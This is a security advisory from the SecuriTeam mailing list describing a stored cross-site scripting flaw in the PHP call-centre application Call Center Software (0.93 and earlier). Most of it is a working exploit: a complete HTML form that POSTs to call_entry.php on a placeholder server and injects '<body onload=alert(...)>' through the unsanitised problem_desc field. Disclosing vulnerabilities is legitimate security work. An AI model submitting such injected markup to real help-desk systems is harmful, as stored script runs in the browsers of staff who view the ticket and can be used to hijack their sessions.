[UNIX] Call Center Software XSS via POST (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Call Center Software XSS via POST (Exploit)
------------------------------------------------------------------------


SUMMARY

<http://www.call-center-software.org/> Call Center Software is "one of
the most important aspects of any call help center, being able to track
and manage calls can be the key to high customer satisfaction. Our 100%
free call center software solution is based on PHP and the MySQL
database". A vulnerability in the way Call Center Software handling user
provided input allows attackers to insert arbitrary HTML and/or Javascript
into the database.

DETAILS

Vulnerable Systems:
* Call Center Software version: 0.93 and prior

Call Center Software allows users to insert a problem description (stored
under the 'problem_desc' field) inside the database. This field is a text
field, therefore any character can be placed there. If the user inserts
HTML and/or Javascript into the description field he can cause the Call
Center Software to return this to the user viewing the problem description
field which in turn can be used to cause a XSS attack.

Exploit:
<html>
<head>
<title>Call Center</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="style***" href="helpdesk.css" type="text/css">
</head>

<body>
<table bgcolor="#FFFFFF" width="100%">
<tr>
<td align="center">
<form method="post"
action="http://remote_server/path/call_entry.php";>
<table border="0">
<tr>
<th class="ttitle">Adding Call</th>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0"
cellpadding="3">
<tr>
<td align="right">Name: </td><td
align="left"><input type="text" name="name" Value="H4ck3r"size="30"></td>
</tr>
<tr>
<td align="right">Phone: </td><td
align="left"><input type="text" name="phone" value="111-555-555"
size="20"></td>
</tr>
<tr>
<td align="right">Department: </td>
<td>
<select name="department_id">


<option value="1">Problem</option>
</select>
</td>
</tr>
<tr>
<td align="right">Issue Type: </td>
<td>
<select name="issue_id">

<option value="6">email</option>

<option value="2">keyboard</option>

<option value="3">monitor</option>

<option value="5">mouse</option>

<option value="4">network</option>

<option value="8">password</option>

<option value="7">word processing</option>
</select>
</td>
</tr>
<tr>
<td align="right" valign="top">Xss Script
Here : </td>
<td align="left"><input type="text"
name="problem_desc" value="<body onload=alert(1395499912)>"
size="50"></td>
</tr>
<tr>
<td> </td><td><input type="submit"
name="submit" value="Add" class="button"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</body>
</html>


ADDITIONAL INFORMATION

The information has been provided by <mailto:corrado.liotta@xxxxxxxx>
Corrado Liotta.
The original article can be found at: <http://www.kasamba.com/CorryL>
http://www.kasamba.com/CorryL



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages